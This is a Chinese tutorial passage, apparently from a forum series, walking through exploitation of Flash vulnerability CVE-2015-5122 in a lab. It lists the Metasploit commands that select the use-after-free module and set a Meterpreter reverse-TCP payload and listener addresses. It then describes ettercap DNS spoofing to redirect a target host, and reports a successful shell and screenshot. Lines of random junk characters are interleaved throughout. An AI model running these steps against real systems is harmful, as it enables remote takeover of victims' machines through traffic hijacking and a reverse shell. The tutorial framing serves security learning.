5 _' T+ ^6 I( A3 [ b8 i, ^
二、cve2015-5122漏洞实例演示虚拟机
/ A/ q7 h6 w9 w3 f " }# c0 a: {2 A# k! k& _% C1 U/ E# _
1 e6 `- k+ I! \3 k 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
4 e( g0 r8 Y! [' m/ f
0 P) Q+ r, f2 t" d+ m* r ?* P7 K1 E: m
, s( N2 Q! f7 d1 b search cve-2015-5122如图:
- n4 a7 U; ~4 z
+ o, L; D) T) U1 X$ y2 I6 Y" r$ Y5 o) g# z( ^
( W' D0 D1 o1 U3 i9 M
$ q" M" v/ Z) e7 {4 {2 A
2 ?6 d; ?( I- l& n, M" R J 下面我们敲如下命令:
9 E, d+ C& {7 E
$ i' J6 e* ^) q0 j, u% V& G6 z( E- b% g
use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 q% L' w8 G8 _+ r5 t
" d/ z# [) {0 H* s+ f# d9 T9 L2 g
( j& c4 w, N3 N& K* p! O set PAYLOAD windows/meterpreter/reverse_tcp 4 m& X5 y! a& A2 _! L/ z# @) g
W' I$ h/ g6 Z' d& _
( {- H+ e! o" i+ A, \
set LHOST 192.168.0.109
7 k% z& [+ Y7 C. H8 [0 _3 V $ ~, r3 D) v3 T% h0 _& N6 D
3 B% n, U2 M# ^
set URIPATH / /*根目录*/ ! ~( B4 q) t3 n4 ?
( G) v; `3 l8 V
5 y Q: P" l1 I9 \2 |# q# Y set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
& s ~ ^5 G$ x# |/ J * m# U2 i) ]5 `* Q
8 D# f, _& q/ I+ k4 S1 H& ^2 _; g
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 , u. q) A' H6 ?3 k7 E3 s- @
1 E5 a; R$ X4 z
?& S% r$ d: j! i( E+ i
然后show options如图: ) f5 L( h; v) Z. i5 y4 p4 U; M
, _2 _+ o5 [4 K( y, F# b( Z8 \8 B, A
' w! ?& d" E' ^$ a& p
8 A) f7 Z/ G4 K/ y) e- X ( r& b$ R, W1 z% S3 o
" a0 y$ B' {3 r( z6 E7 K
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ) C. ]7 t9 Y5 V8 {5 B( j& e6 L
' t( b3 \0 |- w w% W7 n
4 A# e% w/ q9 r v' Y' r7 w$ Y* b, D9 c- b1 y* y
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 " X$ S/ \0 d1 D! `& o# T
+ R+ L. A" M" O' e* _, A% O, u6 k$ g, D" {- w
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
5 L5 W# [6 z( C9 Y- o/ ~
! l8 _9 J1 ]7 b; d- E3 `' Q
4 _7 D5 F( l6 l ; Y' F( R1 G5 i/ m
s6 H; s0 A, I0 T+ r7 Q" }0 J2 E% M7 |. ?( g
成功了,这时候我们断开ettercap,如图:
+ D3 Y& \! O6 p$ s
; i9 S/ z) U( l
1 v" ]0 L5 n# g4 |/ A0 g9 w6 p
1 ^3 E0 ~( @% w7 T* c1 z
* p* m0 U4 U: D( a7 w: X
: g. g, \ a* s1 n7 q Screenshot如图: * |, _; b0 h3 G: x4 n
# \2 T1 A3 g, |* s
: R \, K, e' `" V5 p3 b" z5 y
7 r' n5 h K2 i( S 8 D% [( k9 U6 v) P9 ^) r
/ [4 B- D/ T0 n+ i" @& _" y ! c) M1 l9 j9 j5 H$ L
|